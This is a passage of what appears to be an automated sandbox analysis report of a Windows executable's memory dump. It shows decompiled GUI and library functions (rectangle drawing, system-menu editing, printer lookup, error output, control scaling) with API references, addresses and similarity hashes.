				_t159 =  &(_v44.bottom);
				_t134 = __ecx;
				_t158 = __edx;
				_t157 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *(__eax + 0x17c) != 0) {
					_t137 =  *( *(__eax + 0x17c));
					 *((intOrPtr*)( *( *(__eax + 0x17c)) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t157 + 0x198));
				if( *((intOrPtr*)(_t157 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t157 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t155 = 0;
					do {
						_t79 = E0041C834( *(_t157 + 0x19c), _t137, _t155);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E00427FD0(0xff000010));
							E0041B1E4( *((intOrPtr*)(_t135 + 0x40)) - 1, _t135,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t158,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E00427FD0(0xff000014));
							_t137 =  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1;
							E0041B1E4( *((intOrPtr*)(_t135 + 0x40)), _t135,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t158,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t155 = _t155 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t156 = 0;
				if(_t134 != 0) {
					_t156 = E0041C898(_t78, _t134);
					if(_t156 < 0) {
						_t156 = 0;
					}
				}
				 *_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x198)) + 8));
				if(_t156 <  *_t159) {
					do {
						_t136 = E0041C834( *((intOrPtr*)(_t157 + 0x198)), _t137, _t156);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							_t137 =  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48);
							E0041B1E4( *((intOrPtr*)(_t136 + 0x40)), _t136,  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t158,  &(_v44.top)) != 0) {
								if(( *(_t157 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t158);
								E00445658(_t158,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t158, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								_t137 = _t158;
								E00447F3C(_t136, _t158, 0xf, 0);
								RestoreDC(_t158, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t156 = _t156 + 1;
					} while (_t156 < _v60.top);
				}
			}

0x0044b39c
0x0044b3a0
0x0044b3a3
0x0044b3a5
0x0044b3a7
0x0044b3b0
0x0044b3cc
0x0044b3ce
0x0044b3ce
0x0044b3d1
0x0044b3d9
0x0044b4be
0x0044b4be
0x0044b4c6
0x0044b5cb
0x0044b5cb
0x0044b5cb
0x0044b4cf
0x0044b4d2
0x00000000
0x00000000
0x0044b4d9
0x0044b4dd
0x0044b4df
0x0044b4e7
0x0044b4ec
0x0044b4f5
0x0044b52f
0x0044b552
0x0044b55d
0x0044b567
0x0044b57c
0x0044b598
0x0044b59f
0x0044b5aa
0x0044b5b4
0x0044b5b4
0x0044b5b9
0x0044b5ba
0x0044b5ba
0x0044b5ba
0x00000000
0x0044b4df
0x0044b3df
0x0044b3e3
0x0044b3ec
0x0044b3f0
0x0044b3f2
0x0044b3f2
0x0044b3f0
0x0044b3fd
0x0044b403
0x0044b409
0x0044b416
0x0044b41c
0x0044b441
0x0044b44a
0x0044b45c
0x0044b462
0x0044b464
0x0044b464
0x0044b470
0x0044b47c
0x0044b48e
0x0044b495
0x0044b49e
0x0044b4a9
0x0044b4ae
0x0044b4ae
0x0044b45c
0x0044b4b4
0x0044b4b5
0x0044b409

APIs

RectVisible.GDI32(?,?), ref: 0044B455
SaveDC.GDI32(?), ref: 0044B46B
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0044B48E
RestoreDC.GDI32(?,?), ref: 0044B4A9
CreateSolidBrush.GDI32(00000000), ref: 0044B52A
FrameRect.USER32 ref: 0044B55D
DeleteObject.GDI32(?), ref: 0044B567
CreateSolidBrush.GDI32(00000000), ref: 0044B577
FrameRect.USER32 ref: 0044B5AA
DeleteObject.GDI32(?), ref: 0044B5B4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: fc0d3cf62b4218cbaeb29ed0b1e9ada9aae2207197caed0427c3551be30eee1d
Instruction ID: 797e2c0992912d0dc49b3ed57930f92ad52e54312dd34cfde094d9f6f196728d
Opcode Fuzzy Hash: fc0d3cf62b4218cbaeb29ed0b1e9ada9aae2207197caed0427c3551be30eee1d
Instruction Fuzzy Hash: C7512C716042449BEB14EF29C8C4B5B77E8EF44308F04445AFE898B387D739E845CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00462BA0, Relevance: 15.1, APIs: 10, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00462BA0(intOrPtr _a4) {
				intOrPtr _t27;
				struct HMENU__* _t48;

				_t27 =  *((intOrPtr*)(_a4 - 4));
				if( *((char*)(_t27 + 0x229)) != 0) {
					_t27 =  *((intOrPtr*)(_a4 - 4));
					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
						_t27 =  *((intOrPtr*)(_a4 - 4));
						if( *((char*)(_t27 + 0x22f)) != 1) {
							_t48 = GetSystemMenu(E0044D590( *((intOrPtr*)(_a4 - 4))), 0);
							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
								DeleteMenu(_t48, 0xf130, 0);
								DeleteMenu(_t48, 7, 0x400);
								DeleteMenu(_t48, 5, 0x400);
								DeleteMenu(_t48, 0xf030, 0);
								DeleteMenu(_t48, 0xf020, 0);
								DeleteMenu(_t48, 0xf000, 0);
								return DeleteMenu(_t48, 0xf120, 0);
							}
							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_t48, 0xf020, 1);
							}
							_t27 =  *((intOrPtr*)(_a4 - 4));
							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_t48, 0xf030, 1);
							}
						}
					}
				}
				return _t27;
			}

0x00462ba7
0x00462bb1
0x00462bba
0x00462bc4
0x00462bcd
0x00462bd7
0x00462bf0
0x00462bff
0x00462c09
0x00462c16
0x00462c23
0x00462c30
0x00462c3d
0x00462c4a
0x00000000
0x00462c57
0x00462c6b
0x00462c75
0x00462c75
0x00462c7d
0x00462c87
0x00000000
0x00462c91
0x00462c87
0x00462bd7
0x00462bc4
0x00462c98

APIs

GetSystemMenu.USER32 ref: 00462BEB
DeleteMenu.USER32 ref: 00462C09
DeleteMenu.USER32 ref: 00462C16
DeleteMenu.USER32 ref: 00462C23
DeleteMenu.USER32 ref: 00462C30
DeleteMenu.USER32 ref: 00462C3D
DeleteMenu.USER32 ref: 00462C4A
DeleteMenu.USER32 ref: 00462C57
EnableMenuItem.USER32 ref: 00462C75
EnableMenuItem.USER32 ref: 00462C91

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 0f6c5d92ee3942f3d5e753c1dcc28b2c400ade31a1fce24b9a1ac2a23ffba28a
Instruction ID: 7dee2eb7f943a56462953984972c5910efd220d56ade7dd9b377c937f44dfc5c
Opcode Fuzzy Hash: 0f6c5d92ee3942f3d5e753c1dcc28b2c400ade31a1fce24b9a1ac2a23ffba28a
Instruction Fuzzy Hash: 70215EB0B847407AE730AA64CE8EF597BD85B04B18F1454A5B6087F2D3D6FCF980865E

Uniqueness

Uniqueness Score: -1.00%

Function 004322E0, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004322E0(intOrPtr __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char* _t44;
				void* _t69;
				void* _t70;
				void* _t78;
				long _t88;
				intOrPtr _t90;
				void* _t95;
				void* _t97;
				void* _t102;
				intOrPtr _t107;
				intOrPtr _t113;
				intOrPtr* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;
				intOrPtr _t124;

				_t117 = __esi;
				_t115 = __edi;
				_t97 = __ecx;
				_t94 = __ebx;
				_t122 = _t123;
				_t124 = _t123 + 0xfffffbdc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t105 = 0;
				_v1064 = 0;
				_v1060 = 0;
				_v1056 = 0;
				_v8 = __eax;
				_push(_t122);
				_push(0x4324bd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				_v12 = 0;
				_v16 = 0;
				_push( &_v16);
				_t44 =  &_v12;
				_push(_t44);
				_push(0);
				_push(0);
				_push(5);
				_push(0);
				_push(1);
				L0043158C();
				if(_t44 == 0 && GetLastError() != 0x7a) {
					_t88 = GetLastError();
					_t127 = _t88 - 0x7b;
					if(_t88 != 0x7b) {
						E0040E138(__ebx, _t97, __edi, __esi);
					} else {
						_t105 =  &_v1056;
						_t90 =  *0x4badc4; // 0x426634
						E0040656C(_t90, _t97,  &_v1056);
						E004316E4(_v1056);
					}
				}
				_v28 = E004087C4(_v12, _t97, _t105, _t127);
				_push(_t122);
				_push(0x43247d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124;
				_push( &_v16);
				_push( &_v12);
				_push(_v12);
				_push(_v28);
				_push(5);
				_push(0);
				_push(1);
				L0043158C();
				if(_v16 <= 0) {
					GetProfileStringA("windows", "device", 0x4324cc,  &_v1052, 0x3ff);
					_v20 =  &_v1052;
					_v24 = E00431694( &_v20);
				} else {
					_v24 =  *_v28;
				}
				_t116 = E00432090(_v8, _t94, _t115, _t117);
				_t119 =  *((intOrPtr*)( *_t116 + 0x14))() - 1;
				if(_t119 < 0) {
					L13:
					__eflags = 0;
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x432484);
					return E00402B14(_v28);
				} else {
					_t120 = _t119 + 1;
					_t95 = 0;
					while(1) {
						_push( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x18))() + 8)));
						E004045D0( &_v1060, _v24);
						_pop(_t69);
						_t70 = E00408A98(_t69, _v1060, 0);
						_t131 = _t70;
						if(_t70 != 0) {
							break;
						}
						_t95 = _t95 + 1;
						_t120 = _t120 - 1;
						__eflags = _t120;
						if(_t120 != 0) {
							continue;
						} else {
							goto L13;
						}
						goto L15;
					}
					_t96 =  *((intOrPtr*)( *_t116 + 0x18))();
					_push(E00404898( *((intOrPtr*)(_t72 + 0xc))));
					_push(E00404898( *((intOrPtr*)(_t72 + 4))));
					_t78 = E00404898( *((intOrPtr*)(_t96 + 8)));
					_pop(_t102);
					E00431DB8(_v8, _t96, _t102, _t78, _t116, _t120, _t131);
					E00403E98();
					_t113 = 0;
					 *[fs:eax] = _t113;
					_push(0x4324c4);
					return E004043FC( &_v1064, 3);
				}
				L15:
			}

0x004322e0
0x004322e0
0x004322e0
0x004322e0
0x004322e1
0x004322e3
0x004322e9
0x004322ea
0x004322eb
0x004322ec
0x004322ee
0x004322f4
0x004322fa
0x00432300
0x00432305
0x00432306
0x0043230b
0x0043230e
0x00432313
0x00432318
0x0043231e
0x0043231f
0x00432322
0x00432323
0x00432325
0x00432327
0x00432329
0x0043232b
0x0043232d
0x00432334
0x00432340
0x00432345
0x00432348
0x00432367
0x0043234a
0x0043234a
0x00432350
0x00432355
0x00432360
0x00432360
0x00432348
0x00432374
0x00432379
0x0043237a
0x0043237f
0x00432382
0x00432388
0x0043238c
0x00432390
0x00432394
0x00432395
0x00432397
0x00432399
0x0043239b
0x004323a4
0x004323cb
0x004323d6
0x004323e1
0x004323a6
0x004323ab
0x004323ab
0x004323ec
0x004323f7
0x004323fa
0x00432467
0x00432467
0x00432469
0x0043246c
0x0043246f
0x0043247c
0x004323fc
0x004323fc
0x004323fd
0x004323ff
0x0043240b
0x00432415
0x00432420
0x00432421
0x00432426
0x00432428
0x00000000
0x00000000
0x00432463
0x00432464
0x00432464
0x00432465
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00432465
0x00432433
0x0043243d
0x00432448
0x0043244c
0x00432456
0x00432457
0x0043245c
0x004324a1
0x004324a4
0x004324a7
0x004324bc
0x004324bc
0x00000000

APIs

738D6BB0.WINSPOOL.DRV(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 0043232D
GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 00432336
GetLastError.KERNEL32(00000001,00000000,00000005,00000000,00000000,?,?,00000000,004324BD,?,00000000,?,?,?,00432088), ref: 00432340

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

738D6BB0.WINSPOOL.DRV(00000001,00000000,00000005,00000000,?,?,?,00000000,0043247D,?,00000001,00000000,00000005,00000000,00000000,?), ref: 0043239B
GetProfileStringA.KERNEL32 ref: 004323CB

Strings

device, xrefs: 004323C1
windows, xrefs: 004323C6
4fB, xrefs: 00432350

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastString$LoadProfile
String ID: 4fB$device$windows
API String ID: 1759087498-691026950
Opcode ID: f3e36942b3d9d325df4fe242789fb00a18c4875a1eb19c7da6558f3b05a1f550
Instruction ID: f2ac634cdbc52cec3087abfacf078a93b855a289682706199ff95e3f370f64ea
Opcode Fuzzy Hash: f3e36942b3d9d325df4fe242789fb00a18c4875a1eb19c7da6558f3b05a1f550
Instruction Fuzzy Hash: 0A5143B1A00208AFD710EFA5CD81B9EB7F8EF48704F5144BBF505E7291D6789E418B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 56
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C9D8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				_t40 = __edx;
				E0040C840(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x4bb0d8; // 0x4bc04c
				if( *_t14 == 0) {
					_t16 =  *0x4badb0; // 0x4078ec
					_t9 = _t16 + 4; // 0xffd1
					_t18 =  *0x4bc668; // 0x400000
					LoadStringA(E00405A30(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x4bae1c; // 0x4bc21c
				E00402C70(E00402E00(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E0040946C( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40ca9c, 2,  &_v1092, 0);
			}

0x0040c9d8
0x0040c9e7
0x0040c9ec
0x0040c9f4
0x0040ca5b
0x0040ca60
0x0040ca64
0x0040ca6f
0x00000000
0x0040ca85
0x0040c9f6
0x0040ca00
0x0040ca0f
0x0040ca1f
0x0040ca32
0x00000000

APIs

Part of subcall function 0040C840: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
Part of subcall function 0040C840: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
Part of subcall function 0040C840: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
Part of subcall function 0040C840: LoadStringA.USER32 ref: 0040C93F

CharToOemA.USER32 ref: 0040CA0F
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CA2C
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040CA32
GetStdHandle.KERNEL32(000000F4,0040CA9C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CA47
WriteFile.KERNEL32(00000000,000000F4,0040CA9C,00000002,?), ref: 0040CA4D
LoadStringA.USER32 ref: 0040CA6F
MessageBoxA.USER32 ref: 0040CA85

Strings

x@, xrefs: 0040CA5B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID: x@
API String ID: 185507032-1963665138
Opcode ID: 32963e8ee662bd11d50197303082abe9d9462009d9c906d7f3f530e3eb4146fe
Instruction ID: a46017b86ceaa44181fc0619728259f2fb014beabb00898478d2c3dca9ed91ff
Opcode Fuzzy Hash: 32963e8ee662bd11d50197303082abe9d9462009d9c906d7f3f530e3eb4146fe
Instruction Fuzzy Hash: F31151B1108204AFD700F7A5CC86F9B77ECAB44704F40463BB755F60E2DA78E9548B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0043BBE0, Relevance: 13.7, APIs: 9, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0043BBE0(intOrPtr* __eax, void* __ecx) {
				intOrPtr _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __ebp;
				void* _t85;
				intOrPtr* _t150;
				void* _t152;
				void* _t158;
				intOrPtr _t165;
				void* _t181;
				signed int _t183;
				void* _t186;
				void* _t188;
				void* _t190;
				intOrPtr _t191;

				_t152 = __ecx;
				_t188 = _t190;
				_t191 = _t190 + 0xffffffdc;
				_push(_t181);
				_t150 = __eax;
				_t85 = E0044B720(__eax, _t158);
				_t193 =  *((char*)(_t150 + 0x165));
				if( *((char*)(_t150 + 0x165)) == 0) {
					return _t85;
				} else {
					_v8 = E00428DB4(_t152, 1);
					 *[fs:eax] = _t191;
					E004458F8(_v8, _t150);
					 *((intOrPtr*)( *_t150 + 0x44))( *[fs:eax], 0x43be09, _t188);
					E00428C64( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t193);
					E00429044(_v8,  &_v24);
					InflateRect( &_v24, 0xffffffff, 0xffffffff);
					E00429044(_v8,  &_v24);
					if( *((char*)(_t150 + 0x165)) != 0) {
						_t186 = 0;
						if( *((char*)(_t150 + 0x163)) != 0) {
							_t186 = 0 +  *((intOrPtr*)(_t150 + 0x168));
						}
						if( *((char*)(_t150 + 0x164)) != 0) {
							_t186 = _t186 +  *((intOrPtr*)(_t150 + 0x168));
						}
						_t199 = _t186;
						if(_t186 == 0) {
							 *((intOrPtr*)( *_t150 + 0x44))();
							E00428C64( *((intOrPtr*)(_v8 + 0x14)),  *_t150,  *((intOrPtr*)(_t150 + 0x70)), _t181, _t188, _t199);
							E00429044(_v8,  &_v24);
							InflateRect( &_v24, 0xffffffff, 0xffffffff);
							E00429044(_v8,  &_v24);
						}
						 *((intOrPtr*)( *_t150 + 0x44))();
						E004466E4(_t150,  &_v40);
						_t183 = GetWindowLongA(E004294DC(_v8), 0xfffffff0);
						if(( *(_t150 + 0x162) & 0x00000001) != 0) {
							_v40 = _v40 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000002) != 0) {
							_v36 = _v36 - _t186;
						}
						if(( *(_t150 + 0x162) & 0x00000004) != 0) {
							_v32 = _v32 + _t186;
						}
						if((_t183 & 0x00200000) != 0) {
							_v32 = _v32 + GetSystemMetrics(0x14);
						}
						if(( *(_t150 + 0x162) & 0x00000008) != 0) {
							_v28 = _v28 + _t186;
						}
						if((_t183 & 0x00100000) != 0) {
							_v28 = _v28 + GetSystemMetrics(0x15);
						}
						DrawEdge(E004294DC(_v8),  &_v24,  *0x004A0A18 |  *0x004A0A28,  *0x004A0A38 |  *0x004A0A48 | 0x00002000);
						_v24.left = _v24.right - GetSystemMetrics(0xa) - 1;
						if(E0043A38C(_t150) == 0) {
							DrawFrameControl(E004294DC(_v8),  &_v24, 3, 0x4005);
						} else {
							DrawFrameControl(E004294DC(_v8),  &_v24, 3, 0x4005);
						}
					}
					_pop(_t165);
					 *[fs:eax] = _t165;
					_push(0x43be10);
					return E0040360C(_v8);
				}
			}

0x0043bbe0
0x0043bbe1
0x0043bbe3
0x0043bbe8
0x0043bbe9
0x0043bbed
0x0043bbf2
0x0043bbf9
0x0043be16
0x0043bbff
0x0043bc0b
0x0043bc19
0x0043bc21
0x0043bc2d
0x0043bc39
0x0043bc44
0x0043bc51
0x0043bc5c
0x0043bc68
0x0043bc6e
0x0043bc77
0x0043bc79
0x0043bc79
0x0043bc86
0x0043bc88
0x0043bc88
0x0043bc8e
0x0043bc90
0x0043bc99
0x0043bca5
0x0043bcb0
0x0043bcbd
0x0043bcc8
0x0043bcc8
0x0043bcd4
0x0043bcdc
0x0043bcf1
0x0043bcfa
0x0043bcfc
0x0043bcfc
0x0043bd06
0x0043bd08
0x0043bd08
0x0043bd12
0x0043bd14
0x0043bd14
0x0043bd1d
0x0043bd26
0x0043bd26
0x0043bd30
0x0043bd32
0x0043bd32
0x0043bd3b
0x0043bd44
0x0043bd44
0x0043bd9f
0x0043bdb1
0x0043bdbd
0x0043bdee
0x0043bdbf
0x0043bdd3
0x0043bdd3
0x0043bdbd
0x0043bdf5
0x0043bdf8
0x0043bdfb
0x0043be08
0x0043be08

APIs

Part of subcall function 00428DB4: RtlInitializeCriticalSection.KERNEL32(0042C510,0042C4D8,?,00000001,0042C66E,?,?,?,0042D8E1,?,?,0042D700,?,0000000E,00000000,?), ref: 00428DD4

Part of subcall function 00429044: FrameRect.USER32 ref: 0042906C

InflateRect.USER32 ref: 0043BC51
InflateRect.USER32 ref: 0043BCBD
GetWindowLongA.USER32(00000000,000000F0), ref: 0043BCEC
GetSystemMetrics.USER32 ref: 0043BD21
GetSystemMetrics.USER32 ref: 0043BD3F
DrawEdge.USER32(00000000,?,00000000,00000008), ref: 0043BD9F
GetSystemMetrics.USER32 ref: 0043BDA6
DrawFrameControl.USER32(00000000,?,00000003,00004005), ref: 0043BDD3

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
String ID:
API String ID: 1475008941-0
Opcode ID: 0eb8a9d6ce3d9c223dec1813268cea28a7c3de0a8fadcb6eb727b17a92a48758
Instruction ID: f670bfb040df1e25cdc4aca23a88a12db15828097874a01926c31e2443e94ba3
Opcode Fuzzy Hash: 0eb8a9d6ce3d9c223dec1813268cea28a7c3de0a8fadcb6eb727b17a92a48758
Instruction Fuzzy Hash: EE61E730A042449BDB00EF69CD86BDF77F5EF49304F1401BAB904AB296D7389E05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00446960, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00446960(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x446b0c; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x446b04; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x446b0c; // 0x0
				if(_t113 != (_t107 &  *0x446b08)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x446b0c; // 0x0
				if(_t114 != (_t107 &  *0x446b10)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
